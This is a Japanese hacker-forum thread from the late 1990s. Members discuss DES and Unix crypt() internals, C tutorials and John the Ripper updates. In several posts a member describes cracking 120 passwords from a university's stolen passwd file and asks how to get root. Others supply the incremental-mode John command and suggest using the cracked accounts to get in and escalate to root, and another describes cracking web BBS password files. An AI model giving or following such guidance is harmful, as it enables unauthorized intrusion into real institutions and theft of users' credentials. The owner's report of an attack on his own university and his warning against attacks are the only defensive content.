| 【メッセージ】 やっぱりrootのpassをとらないときがすまないんです。 そこで考えたんですが、二万人もいるから計算が遅いんですよね>Jhon だったらroot関係の行以外をpasswdファイルからはぶいたらどうなんですかねぇ ただいま実行中なんですが、どうなることやら・・・・・ 話かわりますけど どっかに windows ro unix版は ないですか?>Jhon Jhonは dos版しかないんですかねぇ 家のぱそはPC98クンなんで dos版は動かないんですよ。 (仕方なく会社のぱそでこっそりやってますが) たとえばUNIX版があったら サーバにこっそり仕掛けて稼動させとくとか う〜ん さすがにばれるよなぁ(笑) |
| 【名 前】Hariru 【タイトル】いいなあ 12/10 07:30 |
hariru@ami.602.cc |
| 【メッセージ】 >実はJhonにはかけました。が、2万人中たったの120人しかpassを解析できませんでした。 2万人ももっているんですか?いいですね〜。 私なんか、自分で使っている奴しかありません。(たかだか数個) passが120人もあるならそれらを使って表玄関から入り、 内部から根っこを取った方が建設的なのかも知れませんよ。 利用できるツールなら、このうにゅんさんのHPにもありますし。 ちなみに、私はHackしたことはないので詳しくはわからないっす。 私の発言は弱者の戯れ言とでも思ってくださいね。責任は持ちませんよ。 to うにゅんさんへ Fortuneの広告攻撃って、いったいどんな攻撃なのでしょう。 SPAMメールみたいなものなのでしょうか? |
| 【名 前】k00L 【タイトル】をぉ 12/09 21:15 |
webmaster@backsection.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >実はJhonにはかけました。 >が、2万人中たったの120人しかpassを解析できませんでした。 ・・・しか?・・(汗) そんだけ盗れれば十分じゃないですか(^^;; rootが目的ではないのでしょうか?(笑) 知的好奇心ですよね。(^-^) しかしスゴイですね>2万人 |
| 【名 前】うにゅん 【タイトル】あれま 12/09 17:37 |
unewn4th@usa.net |
| 【メッセージ】 とうとう、Fortuneの広告攻撃を受けてしまったようです。 全部入ってる... |
| 【名 前】うにゅん 【タイトル】れすれす 12/09 17:31 |
unewn4th@usa.net |
| 【メッセージ】 >AgentMさん >socketとかbindとか出てくるのを楽しみにしてます。期待。 もちろん出てきますよ。予定ですけど... >DarkXさん shadowがかかってる場合は、解析不能です。でも120人できたって ことはshadowなしpasswdか、shadow本体ですね。 インクリは john -i passwd ですよ。計算すると分かりますけど、 k00Lさんの言う通り、生きてるうちに終わらない可能性があります(笑)。 |
| 【名 前】tetete 【タイトル】re:(1)pass 12/09 17:20 |
|
| 【メッセージ】 http://www.ww.rim.or.jp/~tamon/cgi-bin/minibbs.cgi ここにjohn the Ripper v1.4の説明があります ↓これ 「johnJ.html(日本語HTML/TamTam版)」 「ルールのすすめ」も読んだ方が良いと思います |
| 【名 前】うにゅん 【タイトル】re:(1)こんにちわ 12/09 17:16 |
unewn4th@usa.net |
| 【メッセージ】 >事の発端はMicrosoftZが2600鯖にあるファイルに無断直リンを貼ったのを >Pcket Storm側が警告した所MicrosoftZが逆にサイバースペースの共有 >を主張して逆にKen Williamsを挑発してます。 PacketStormに直リン張ってるとこって結構見ますけどねぇ... もともと仲が悪かったんでしょうかね。しかし、ウチもDoc中でtop以外 にリンク張ってるからなぁ〜。まぁ、いいや。 |
| 【名 前】AgentM 【タイトル】初めまして 12/09 16:55 |
|
| 【メッセージ】 Penguin Academy、いいですね。 socketとかbindとか出てくるのを楽しみにしてます。 期待。 |
| 【名 前】DarkX 【タイトル】pass 12/09 15:31 |
|
| 【メッセージ】 >とある大学のサーバのpasswdを入手したのですが >どうしてもrootのpassが解読できません。 >どうすればいいでしょうかねぇ。 >どうしても・・・ってJohnにはかけたのですか? >そのファイルはShadowですか? >いずれにしろ意味不明で複雑なPasswdは簡単には解析できないですよ。(^^;; >インクリでやれば理論的には解けないPasswdはないですが >前述のようなPasswdなら数年(数十年)かかるのもあるし。 実はJhonにはかけました。が、2万人中たったの120人しかpassを解析できませんでした。 はっきり言ってよくJhonの使い方は分かっていません。 多分shadowではないとおもいます。だから何とかなるとおもったんですが・・ ちなみにインクリでやりたいんですが実はインクリのコマンドが(オプションの指定方法が) よく分かりません。 |
| 【名 前】BEAMZ 【タイトル】こんにちわ 12/09 00:27 |
|
| 【メッセージ】 ネタも無くカキコするのもアレですのでロムってました。 今、ちょいと海外で面白い戦争が起こりそうです。 Pcket Storm VS MicrosoftZです Pcket Stormは知る人ぞ知る2600の鯖を親とした Ken Williamsが主催するかなり大物サイトで そこにフランスのかなり知名度のある MicrosoftZが喧嘩を売りました 事の発端はMicrosoftZが2600鯖にあるファイルに無断直リンを貼ったのを Pcket Storm側が警告した所MicrosoftZが逆にサイバースペースの共有 を主張して逆にKen Williamsを挑発してます。 これは少し成り行きが面白いです。 次にKen Williamsがどういう動きをするか見物です 下手したらアメリカの2600系VSフランスのハッカーの戦争になるかも・・ Packet Storm http://www.Genocide2600.com/~tattooman/index.shtml MicrofoftZ http://ourworld.compuserve.com/homepages/phineasphreak/ |
| 【名 前】k00L 【タイトル】にゃ? 12/08 18:20 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >とある大学のサーバのpasswdを入手したのですが >どうしてもrootのpassが解読できません。 >どうすればいいでしょうかねぇ。 どうしても・・・ってJohnにはかけたのですか? そのファイルはShadowですか? いずれにしろ意味不明で複雑なPasswdは簡単には解析できないですよ。(^^;; インクリでやれば理論的には解けないPasswdはないですが 前述のようなPasswdなら数年(数十年)かかるのもあるし。 |
| 【名 前】DarkX 【タイトル】passwdの解析について 12/08 17:24 |
yasuo-s@geocities.co.jp |
| 【メッセージ】 とある大学のサーバのpasswdを入手したのですがどうしてもrootのpassが解読できません。 どうすればいいでしょうかねぇ。 どっかにいい辞書はないですか。もしくは Jhonの使い方を詳しく書いてあるサイトはありませんか? (できれば日本語がいいんですが・・・) 誰かレスください。(メールでもいいです) |
| 【名 前】k00L 【タイトル】res 12/08 14:27 |
webmaster@backsection.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >あと、全然関係ないんですけど「う・ん・ち・く」っていうの >バ○○ードか何かを意識されてましたか?>k00Lさん その通りです(汗)参りました。ごめんなさい。 >うにゅん師 ボクのメル、魔空空間に引きずり込まれたようですね(汗) 例のメーアドもいっかい送りますね。 |
| 【名 前】tetete 【タイトル】crypt()について 12/08 13:18 |
|
| 【メッセージ】 crypt()についての説明がここにあります(ちょっとだけ) http://criepi.denken.or.jp/local/MAN/sunos/man3/encrypt.3.html |
| 【名 前】int ZER0 【タイトル】Japanese and Swahili 12/08 01:50 |
intzer0@usa.net |
| 【メッセージ】 >JavaとJavascriptは日本語とスワヒリ語くらい違いますよ〜 >Netscapeが開発したJavaScriptは文法的にはJavaに似ていますが >Javaとは似て非なるものです。 略) そのようですね。入手してきた本にもそんな記述がありました。 Java、JacaScriptの両方をマスターすべくがんばります(^^) あと、全然関係ないんですけど「う・ん・ち・く」っていうの バ○○ードか何かを意識されてましたか?>k00Lさん 変なこと聞いてすみません。 |
| 【名 前】Rorrim 【タイトル】れ↓ 12/08 01:15 |
49-hack@ijk.com |
| 【メッセージ】 もちろん大元を参考文献にしてください。 いっちゃ〜なんですが コピーライトなんてXX食らえです(笑) |
| 【名 前】Hariru 【タイトル】re:(1)DESですか? 12/07 07:55 |
hariru@ami.602.cc |
| 【メッセージ】 >DES暗号に付いては、わたしもちょっと書いてます。 >よかったらうちのページに来てみて下さい。 あ、はい。もちろん参考にさせてもらいました。 暗号に対する全体像をつかむには、最高の読み物だと思いますよ。 でも、あれってどこぞの写しでは・・・?それともあっちが・・・? これって、まずい発言? 参考文献を載せる場合、どちらがいいのかちょっと迷ってます。 |
| 【名 前】うにゅん 【タイトル】re:(1)DESですか? 12/07 02:10 |
unewn4th@usa.net |
| 【メッセージ】 >DES暗号に付いては、わたしもちょっと書いてます。 >よかったらうちのページに来てみて下さい。 をや〜??Rorrimさんとこは、ほぼ毎日行ってたんですけど 気づかなかったよ〜。速攻、私の89CDに追加しました(笑) いや〜、良く書けてますよ。暗号化の全体像が分かりやすく 解説されていて、しかもDocumentとしてちょうどいい量ですね。 >前回の制御文のときにインクリまでかいたんで >今回付け加えるべき「基本」があればリクエストください。 前回の制御文は、Cの第1関門といったところですからかなり重要 ですけど、今回の関数も「手続き型」の基本となるところですから、 やっぱりかなり重要ですね。 とりあえず、関数の作成法と引数の渡し方、リターン値の受け取り といった、基本的なことでいいと思います。ポインタは後の章での 解説になりますから、それが絡んだのはやっぱり後回しにしますか... |
| 【名 前】Rorrim 【タイトル】DESですか? 12/07 01:40 |
49-hack@ijk.com |
| 【メッセージ】 DES暗号に付いては、わたしもちょっと書いてます。 よかったらうちのページに来てみて下さい。 ここのリンクにあります。(^^; http://www.geociteis.co.jp/SiliconValley-PaloAlto/9229/ To うにゅんさん 書いてますよ〜 でも関数をどんな奴にするか悩み中です。 なるべくいろんな事書いといたほうがいいですからね〜 前回の制御文のときにインクリまでかいたんで 今回付け加えるべき「基本」があればリクエストください。 |
| 【名 前】k00L 【タイトル】う〜 12/06 21:04 |
http://BASE.OC.TO |
| 【メッセージ】 >うにゅんさん 読めまへんで。>メル なんでやろ? 〜う・ん・ち・く〜 JavaとJavascriptは日本語とスワヒリ語くらい違いますよ〜 Netscapeが開発したJavaScriptは文法的にはJavaに似ていますが Javaとは似て非なるものです。 スクリプトはWebページのHTMLファイル内にプログラム(スクリプト)コードを記述しておいて、直接的にHTMLの機能を強化する様に働きます。 アプレットやアプリケーションなどは存在しません。 Javaは米国サンマイクロシステムズ社が開発した新しいプログラミング言語です。 文法的にはCやC++等に似たオブジェクト指向言語であり、特に ネットワーク機能が強化されています。 |
| 【名 前】int ZER0 【タイトル】Java & JavaScript 12/06 19:54 |
intzer0@usa.net |
| 【メッセージ】 >いきなり、VC++&MFCとかやると死ぬので、ConsoleとかUNIXで >やりましょう。 私はこれで死んできました(笑) >Java、JavaScriptは、C++できるなら後は慣れの問題だと思います。 >本を一冊買ってきて読めば一晩である程度慣れますので... 一応、雰囲気はつかめました。 一つ言語を覚えてると結構楽かもしれませんね 意外に早くマスターできそうです。 それと私、JavaとJavaScript混同してました。ハズカシ〜 >hariruさん 大変かと思いますがDESのドキュメントがんばってくださいね |
| 【名 前】うにゅん 【タイトル】re:(1)crypt() 12/06 07:31 |
unewn4th@usa.net |
| 【メッセージ】 >DESのDocの方は、DESの暗号化アルゴリズムを詳細にまとめたもの >になりつつあります。 >現在8割ほどできあがりました。 いい感じですね〜 >シミュレーションといっても、実際は時間かかる手作業なんですが・・・(涙) 実際、手作業的に全部解剖していったほうが、読んでる人には 分かりやすい(というか、実感がわく)と思います。 しんどいでしょうが、なんとかがんばてください。 >しかし、こういうDocを書くのは初めてなので、いろいろなところ >からのパクリになってます。 >そんなんでいいんでしょうかね。 参考にしたドキュメントは、「参考文献」に入れておいてくださいね。 要するに、オリジナルな解説や切り口があればいいと思います。 一般的なDESの解説DOCは、ある程度の数学的な知識を前提に書かれた ものが多く、「初心者にもわかりやすい解説」にすると解説方法に オリジナリティが出ると思います。基本的に、論文的なものじゃ なく参考書的なものなので、それでいいと思います。 完成したら、メール添付でお願いします。 The ShadowPenguin Documents. No.12 に著者=hariruで登録させていただきます。 |
| 【名 前】hariru 【タイトル】crypt() 12/06 06:40 |
hariru@ami.602.cc |
| 【メッセージ】 うにゅんさん、int ZEROさん、 cryptのヒント参考にさせてもらいます。 ありがとうございました。 あとはcrypt()のソースを入手しましたので、こちらの方から勉強してみます。 DESのDocの方は、DESの暗号化アルゴリズムを詳細にまとめたものになりつつあります。 現在8割ほどできあがりました。 あとは実際に平文を入れて、どんな暗号文になるのかをシミュレーションしてみたいと思います。 シミュレーションといっても、実際は時間かかる手作業なんですが・・・(涙) ああ、私もみなさんのようにCをガリガリ書けたらなあ。 しかし、こういうDocを書くのは初めてなので、いろいろなところからのパクリになってます。 そんなんでいいんでしょうかね。 そんな自問自答の日々が続く・・・。 PS. 開発者の方々、ライバルの方も成長しているようなので、 ゴエモンづくり頑張ってくださいね。 |
| 【名 前】うにゅん 【タイトル】re:(1)ここは濃いっ! 12/06 04:45 |
unewn4th@usa.net |
| 【メッセージ】 >メアドって使えました? >っていうか・・届いてます この件、メルしました。見てくださいね〜 >いまさら覚えるのもムリっぽいのでPerl覚える事にしました。(笑) やっぱり、Cとアセンブラは大切なのでやっときましょう。 今からでも遅くないと思いますよ〜 いきなり、VC++&MFCとかやると死ぬので、ConsoleとかUNIXで やりましょう。 Rorrimさんが、早急にAcademyの続きを書いてくれるらしいです。 (見てますか〜 Rorrimさん) >int ZEROさん Java、JavaScriptは、C++できるなら後は慣れの問題だと思います。 本を一冊買ってきて読めば一晩である程度慣れますので... |
| 【名 前】k00L 【タイトル】ここは濃いっ! 12/06 02:13 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 あいかわらずコアなネタで盛り上がってますね。 厨房のボクにはスワヒリ語にしか聞こえません(殴 @うにゅん先生 メアドって使えました? っていうか・・届いてます? @int ZEROさん 初めまして >私、Cは読み書きできますがJavaは読むことすらできません。 >HPにかけられたJavaPasswdも破れません(笑) >この際、Java勉強しようかしらん ボクはまったく逆です。 Javaのパス制限はへなちょこさいさいなのですが Cは宇宙語としか思えません。(涙) いまさら覚えるのもムリっぽいのでPerl覚える事にしました。(笑) @Rorrimさん また遊びに来てくださいね。 @reverseさん また暴れに来てくださいね。(殴 |
| 【名 前】int ZER0 【タイトル】JAVA 12/05 22:48 |
intzer0@usa.net |
| 【メッセージ】 私、Cは読み書きできますがJavaは読むことすらできません。 HPにかけられたJavaPasswdも破れません(笑) この際、Java勉強しようかしらん 覚えたい事いっぱいあり過ぎて困るぅ(笑) |
| 【名 前】HiRoShi 【タイトル】おっ 12/05 13:31 |
|
| 【メッセージ】 Johnが新しくなったんですね。 最近忙しくて全然ゴエモンの実験できてませんでした、スミマセン。 ゴエモン開発、体を壊さない様頑張ってください。 |
| 【名 前】Rorrim 【タイトル】あれま〜 12/05 03:17 |
|
| 【メッセージ】 そっか〜*が表示されなかったのか(;;) John君が新しくなった模様 http://www.false.com/security/john/ v1.5 から v1.6 でに変更 --------------------------- バッチモード: 使いやすくなった ケルベロス AFS パスワードサポート WinNT パスワードサポート(LM hashes only). LinuxでIdle プライオリティサポート ルール拒否フラグ: ルール全体を拒否 新しいユーティリティ: 'unique' (リロード無しに重複行を削除) 新しいオプション: '-stdout', '-status' GNU-style ロングオプションサポート 新しいターゲット AIX, HP-UX, IRIX バグフィックスと操作性の向上 んじゃ |
| 【名 前】Rorrim 【タイトル】れれ、初めまして 12/05 01:49 |
49-hack@ijk.com |
| 【メッセージ】 > stdio.h stdlib.h >int ZEROさん、うにゅんさん 御指摘ありがとうございましゅ。 実際、Cの規格書なんて見る事のない 一般ユーザとしては、大変意義深いものです。 CもJavaみたいに読み込むファイルを 指定せずに全部読むようにすりゃいいのに〜(笑) import java. ってね(爆) あくあさ〜〜〜ん 元気でした? ICQくださいよ〜 |
| 【名 前】int ZER0 【タイトル】re:(2)はじめまして 12/05 00:37 |
intzer0@usa.net |
| 【メッセージ】 >>それぞれの文字の下位7bitを取ってもととなる56bitのkeyを生成する。 >略) >このsaltを使ってキーを暗号化するあたりがミソで、一番 >時間もかかります。ココを何とか早くしたいんですけどね。 私がコイツを理解するにはもっと時間が必要なようです 私も陰ながら応援しています:-) >ゴエモン >>"stdlib.h" >たぶん、「その他の関数群」ってところでしょう(笑) うんうん、なんかつめ合わせってカンジがイイです(笑) |
| 【名 前】うにゅん 【タイトル】re:(1)はじめまして 12/04 05:09 |
unewn4th@usa.net |
| 【メッセージ】 >それぞれの文字の下位7bitを取ってもととなる56bitのkeyを生成する。 たしかにパスがkeyのモトになりますね。 結局はSaltを使ってkeyを暗号化するわけです。 ですから、cryptは大きく分けて、キーを用意する部分と saltを使って用意されたキーを暗号化する部分からなります。 このsaltを使ってキーを暗号化するあたりがミソで、一番 時間もかかります。ココを何とか早くしたいんですけどね。 >DESとRSAについては共にほぼ20年前の技術であり、 >その開発当初には予想されていなかった解読方法が次々に >発表されている。 たしかにDESは、一種の挑戦状と言えますね。 アルゴリズムをスッパリ公開してるんですから。 でも、やはり解析にはむちゃくちゃ時間がかかるらしいですね。 >"stdlib.h"というヘッダファイルは、 ANSI規格書にも同じような記述がありますね。 何でユーティリティ関数っていうのかは不明ですけど。 たぶん、「その他の関数群」ってところでしょう(笑) でも、メーカー毎に結構好き勝手してるので、stdioも含めて ある意味stdじゃないです(笑)。 |
| 【名 前】int ZER0 【タイトル】はじめまして 12/04 04:02 |
intzer0@usa.net |
| 【メッセージ】 Penguin BBSの皆様、はじめまして。 だいぶ前からROMしていましたが、よろしくお願いします。 DESとかcryptとか面白そうなこと話題にしてたので、つい出てきてしまいました(^-^; >一応、DES準拠ってことで、基本的には、keyを生成して、 >それを用いて平文となるパスワードを暗号化するわけですが、 >そこにsaltが絡んできて、結局は不可逆な暗号化になるようです。 unixのpasswdの暗号化というものはユーザが入力したパス(最高8字のASCII文字列)から それぞれの文字の下位7bitを取ってもととなる56bitのkeyを生成する。 つまり、passwdがkeyのもとになる、みたいなことを何かで 読んだような気がしているのですが(何処でみたのか覚えてないです。スイマセン) これって違っているのでしょうか? それと最近読んだ本で 「DESとRSAについては共にほぼ20年前の技術であり、その開発当初には 予想されていなかった解読方法が次々に発表されている。これらについて興味がある読者は (〜なんちゃら) を見るとよいだろう」 のような記述があって、おぉこいつは使える!(ニヤリ)とか思っていたのですが DESとcryptが違うとなると、これもcrypt解読にはつかえないんでしょうかねぇ。 ということは、やはりゴエモン様に斬っていただくしかありませんね(笑) あと、Penguin Academy「制御文」読みました。 "stdlib.h"というヘッダファイルは、数値変換(Ex. atoi)や記憶割り当て(Ex. malloc)とか あとはexit()等の関数を宣言するためのものですね。 (これらはユーティリティ関数と呼ばれてるみたいですが、よくは知りません(笑)) 「制御文」での例では、これらの関数は使っていませんから "stdlib.h"はインクルードする必要はないと思います。 でも、コンパイラがいちいち注意してくるわけでもないですし、 できたバイナリに差異はありませんからそんなに気にしないと思いますが ...って書いてみたんですけど、こんなこと私が説明するまでもなかったのでは(汗) 初カキコでずいぶん長くなってしまいました。 それに、もうこんな時間(アセアセ) それではこれにて失礼をば |
| 【名 前】うにゅん 【タイトル】おおおおおおおおおお!!!! 12/03 19:35 |
unewn4th@usa.net |
| 【メッセージ】 おおお!! 生きてたんですね!! 心配しましたよ〜、いったい何やってたんですか? ICQくらさい。 |
| 【名 前】あくあ 【タイトル】足跡。 12/03 18:01 |
|
| 【メッセージ】 足跡です。 うにゅんさん、がんばってね〜。 |
| 【名 前】うにゅん 【タイトル】re:(5)教えて君 12/03 16:44 |
unewn4th@usa.net |
| 【メッセージ】 >crypt()のアルゴリズムがわかっていないので書けないと思いますよ。 >せめて、DESのアルゴリズムとの違いがわからないことには・・・。 DESは、普通のHasingアルゴリズムを使用するため、当たり前ですが 暗号化・複合化が可能ですけど、cryptの場合は一方法Hasing アルゴリズムのため、複合は困難(というかほとんど無理)です。 そこが最大の違いでしょう。 DES自体もキーの解析はかなり困難ですけど、パスワードには はやり一方向暗号化が適してますから。結局cryptで入力されたパスと passwdファイルのSaltから暗号化パスワードを算出し、それと passwdが一致したらOKってするのが、やっぱり一番無難ですから。 DESに関しては、色々な技術資料がありますけど、Cryptとなると ホントありませんね。あったら誰か教えてください(笑) 私の持ってる資料はcryptのソースだけです。 一応、DES準拠ってことで、基本的には、keyを生成して、 それを用いて平文となるパスワードを暗号化するわけですが、 そこにsaltが絡んできて、結局は不可逆な暗号化になるようです。 不可逆性の数学的な証明は試みましたが、すぐ挫折しました(笑) 一応、数式レベルには落ちたんですけど、これでいいのかは 不明です。ただ、「これがcryptのアルゴリズム」として 勝手に解釈してるので(笑)。 もう少し、スッキリして説得力のある数式にしないとね。 って、その前にゴエモンをさっさとやらないと... ってことで、DES、とりあえずお願いしま〜す。キーの生成過程と それに伴う平文の暗号化課程(f関数の値とそれの伝搬課程なども)を、 具体例を交えて進めるってのがいいかもしれません。 あぁ、これだとすごい巨大な文書になるか... (自動でドキュメント生成しちゃってもいいですけどね) おまかせします。 |
| 【名 前】Hariru 【タイトル】re:(4)教えて君 12/03 06:43 |
hariru@ami.602.cc |
| 【メッセージ】 >とりあえず、ちょっと書いてみてもらえますか? ラジャーです。 DESのアルゴリズムの方は、わかったつもりなので書いてみます。 でもcryptに関するDocの方は、 crypt()のアルゴリズムがわかっていないので書けないと思いますよ。 せめて、DESのアルゴリズムとの違いがわからないことには・・・。 その辺のところだけでも教えていただけませんか? しかし、自分で質問しておいて自分で書くことになるとは思いませんでした(笑) |
| 【名 前】うにゅん 【タイトル】re:(3)教えて君 12/02 20:48 |
unewn4th@usa.net |
| 【メッセージ】 >これに関して手伝えることがあったら手伝いますので、 おお、これは助かります。 技術的なドキュとして、DES関連は絶対必要ですからね。 とりあえず、ちょっと書いてみてもらえますか? それをベースに、追加・編集して完成させましょう。 |
| 【名 前】うにゅん 【タイトル】re:(1)アップアップ(謎?) 12/02 20:36 |
unewn4th@usa.net |
| 【メッセージ】 >アップしました。 了解しました。更新しま〜す。 >私もPort−Scannerとか使うので 鯖によりけりですね。 ><ちょっとした事件>って(謎) 私が、とある所にアレなことをしたのがバレて、その隠蔽工作として ナニなことをしたついでに、管理者の鯖にアレなことを... で、管理者がピリピリしてるんです(笑) |
| 【名 前】Rorrim 【タイトル】アップアップ(謎?) 12/02 15:30 |
49-hack@ijk.com |
| 【メッセージ】 アップしました。 昨日のフォーチュンはサーバーメンテかなんかで HPの更新ができない状況にあったようです。 それでは、ToPpageの変更等お願いします。 P.S. 私もPort−Scannerとか使うので 間違って繋げない様にしなくては・・・ BISQUEさんがいた頃の事なんでしょうね〜? <ちょっとした事件>って(謎) |
| 【名 前】Hariru 【タイトル】re:(2)教えて君 12/02 07:06 |
hariru@ami.602.cc |
| 【メッセージ】 >これは、原理的にできないです。 ふ〜む。やはりできないのですか。 でも、アルゴリズムがわかれば逆算的に可能性を絞っていけませんか? saltがわかるんだから、できそうな気がするのですが。 >今度、Cryptに関するDoc書きますので。 ああっ、忙しい中すみません。 これに関して手伝えることがあったら手伝いますので、許してくださいね。 |
| 【名 前】うにゅん 【タイトル】re:(1)ひゅ〜 12/02 02:21 |
unewn4th@usa.net |
| 【メッセージ】 >・・って笑い事ぢゃないかな(汗) 私は、ウチがハックされようが構わないんですけどね。 別にデータ持っていかれても、私の腹は痛まんし。 ただね。管理者がね〜。詳しくは、ここのHPから消えてしまった、 「管理者ヨ─君」のドキュをご参照ください(笑) >生でかましたのかな〜? らしいです。素で来るとは、なんとも... でも、実際に侵入してきた場合は、厚生省が動き出すので もっと厄介です。だから、まだラッキーだったと思います。 >最近にわかに「丘ハッカー」が増えましたね。 ログ見たんですが、下調もなしにいきなり23なんかに繋げてますし (何をやりたかったのかは不明)、他にも意味不明なポートに色々接続 していたようです。まぁ、ポート番号なんて変えてますけどね。 もうちょいマシな攻撃法はいくらでもあるんですけど、そういう のはやってませんでした。 telnet等で接続すると、一応警告文が出たと思うんですけど、 無視しちゃったようです。 |
| 【名 前】k00L 【タイトル】ひゅ〜 12/02 01:45 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 コワイっすね〜(^^;; うにゅんさんクリフォード・ストールみたいですねー。(笑) ・・・って笑い事ぢゃないかな(汗) 生でかましたのかな〜? ハッカージャパンとか読んで、すっかりその気になっちゃったんでしょうね。 なんともイタイケな少年ですな。(涙) 最近にわかに「丘ハッカー」が増えましたね。 ボクもだけど(殴 |
| 【名 前】うにゅん 【タイトル】re:(3)ふい〜ぃ 12/02 01:44 |
unewn4th@usa.net |
| 【メッセージ】 >ネットレンジャー、InternetScannerみたいなリアルタイム監視ツールが入ってたら、 >もう、どうしようもないですね。 これらのツールほど、たぶん強力じゃないと思いますけど、 たいがいのセキュリティーホールへの攻撃や、各種ポートへの connectは、全てリアルタイム監視します。 アタックがあると、登録してある携帯電話に自動転送して、 攻撃元や日時、攻撃の種類等を知らせます。 セキュリティーホールは全部公開されてる訳じゃない ですし、モレもあるかもしれませんけどね。 だから、アタックの試みだけでも、通報するらしいです。 一度、ちょっとした事件(笑)があってから、管理者がピリピリ しちゃって... |
| 【名 前】reverse 【タイトル】re:(2)ふい〜ぃ 12/01 23:20 |
esreverhttp://members.tripod.com/~reverse/ |
| 【メッセージ】 ひぃ〜、恐いよぉ。 ネットレンジャー、InternetScannerみたいなリアルタイム監視ツールが入ってたら、 もう、どうしようもないですね。 > 今日、夕方4:32ごろ攻撃モドキがあったようで、攻撃元ISP、IPA、 ISP? 踏み台なしですかねぇ。 それとも追跡かなぁ、恐い恐い。 > ちょうど、ゴハン食べにいってて、管理者の携帯電話にアタック ああ、不規則な生活(笑) |
| 【名 前】うにゅん 【タイトル】re:(1)ふい〜ぃ 12/01 21:01 |
unewn4th@usa.net |
| 【メッセージ】 >「制御文」書き終わった〜〜。 いや〜、ありがとうございます〜 >第5回に「関数」を扱いたいと思います。 はいはい。了解です。 >ちょっとフォーチュンが混んでるみたいなんで ココ、遅いんですよね。 やっぱ、早く引っ越そう... >昨日のICQ、楽しかったです。 Rorrimさんとは、おひさしぶりでしたね〜 あ、それと昨日のICQでも話が出ましたけど、ウチの大学 への攻撃について、一応ココでも書いておきます。 今日、夕方4:32ごろ攻撃モドキがあったようで、攻撃元ISP、IPA、 JPCERT、および厚生省(医療データ関連の機密データがありますからね) に速攻通報されてました。私の作成した監視ツール群の全てに 引っ掛かってましたから、相手は初心者のクラッカーモドキだと 思いますけど... ツール類は私が作成したものですが、私の力で物事を闇に葬る ことはできません。すべてウチの管理者が手を打ちます。 ちょうど、ゴハン食べにいってて、管理者の携帯電話にアタック ありの自動警報電話が監視ツールからかかってきました。 攻撃は、未遂に終わったようですけど、未遂でも報告されます。 帰ってきて、すぐに対策を初めて、1時間30分くらいで追い込まれ ました。本人(高校生)、および保護者から謝罪の電話があり、 一応未遂と断定したそうです。 今回は、未遂ということで、すぐに厚生省に連絡して大事にはいた らなかったらしいです。でも、入った場合は、私はよく知りませんが 厚生省の方から警察その他に通報されると思います。 私の大学を攻撃して、私にメールなどで直接「冗談でした」などと 言ってきても、私には何もできません。よほど、ウチのデータが欲 しいなら別ですが、どうか興味本位でやらないでください。 もし、ココに来てくれてる人だと、私の構築した監視ツール群 で捕まるってのは、あまり気持のいいものじゃないです。 これで4度目です。 |
| 【名 前】Rorrim 【タイトル】ふい〜ぃ 12/01 19:41 |
49-hack@ijk.com |
| 【メッセージ】 <アカデミ〜> 「制御文」書き終わった〜〜。 さすがに300行を超えたので 今回(第4回)は「制御文」オンリーにして 第5回に「関数」を扱いたいと思います。 ちょっとフォーチュンが混んでるみたいなんで 今日明日中にアップします。 P.S. 昨日のICQ、楽しかったです。 また、今度お話しましょ〜ね(ハート) (ネットで知り合った他人行儀な女子高生風) |
| 【名 前】うにゅん 【タイトル】re:(1)報告 12/01 14:40 |
unewn4th@usa.net |
| 【メッセージ】 >”Extusr”がダウンロードできません。 あ、ソースだけになってますね。家に帰ってコンパイルして exeをアップしときます。 |
| 【名 前】うにゅん 【タイトル】re:(1)教えて君 12/01 14:34 |
unewn4th@usa.net |
| 【メッセージ】 >一撃で暗号化された文字列からパスワードを復元させることはできないのか、 >なんて無謀なことを模索していました。 ・・・中略 >crypt()が具体的にどういうアルゴリズムなのかさっぱりです。 これは、原理的にできないです。 う〜ん、一口では説明できないですけど、 要するに、不可逆になるんで、一発OKって訳にはいかないんです。 今度、Cryptに関するDoc書きますので。 >2文字が、salt自身だったと知ったときは思わず笑っちゃいました。 こうでないと、login処理が困りますね。 まぁ、ログインも4096通り試せばいいんですけどね(笑) でもこれだと、信頼性の問題もありますか。 |
| 【名 前】偽りの予言者 【タイトル】報告 12/01 12:26 |
|
| 【メッセージ】 うにゅんさん”Extusr”がダウンロードできません。 すみませんが再UPおねがいします。 P.S.いろいろダウンロードさしてもらいました。 ありがとうございます。 これからもがんばってください。 |
| 【名 前】k00L 【タイトル】ちわ 12/01 12:12 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 え〜手持ちのPasswdファイルは使いきったので(元々ほとんど無いのにえらそうに書いてみる:笑) htpwdやminibbsのパスワードを解析しています。 そこではtxtファイルは当然「:ぱすわーど::::」になってIDRuleは使えないのですが デフォルトの辞書検索で2秒なんてところがいっぱいあって Johnとの比較ができませんね・・・速過ぎて(笑) |
| 【名 前】Hariru 【タイトル】教えて君 12/01 07:03 |
hariru@ami.602.cc |
| 【メッセージ】 連続カキコすみません。 石川五右衛門=斬鉄剣=必殺の一撃 ということでここ数日間、 一撃で暗号化された文字列からパスワードを復元させることはできないのか、 なんて無謀なことを模索していました。 愚者ですね〜。歴代のハッカーたちのできなかったことに挑戦するなんて。(笑い) まずはDES暗号化がどんなものなの調べて、アルゴリズムはわかったのですが、 よく調べるとunixのパスワードで使われている暗号化のアルゴリズムは、 DESに準拠したパスワード暗号化用ルーチンらしく、違ってました。 結局、暗号化はcrypt()で(なぜかCじゃできないのでperlで)できるのはわかったのですが、 crypt()が具体的にどういうアルゴリズムなのかさっぱりです。 crypt()のアルゴリズムを知っている方がいましたら、 私に愚者と認識させるためにも、教えてもらえないでしょうか。 お願いします。 PS. crypt()で暗号化されたパスワードの最初の2文字が、 salt自身だったと知ったときは思わず笑っちゃいました。 だって、こっちのほうも4096通り全て試すんだと思っていましたから。 やっぱり、愚者ですね〜。(笑い) |
| 【名 前】Hariru 【タイトル】祝!BBS開設一ヶ月 12/01 06:57 |
|
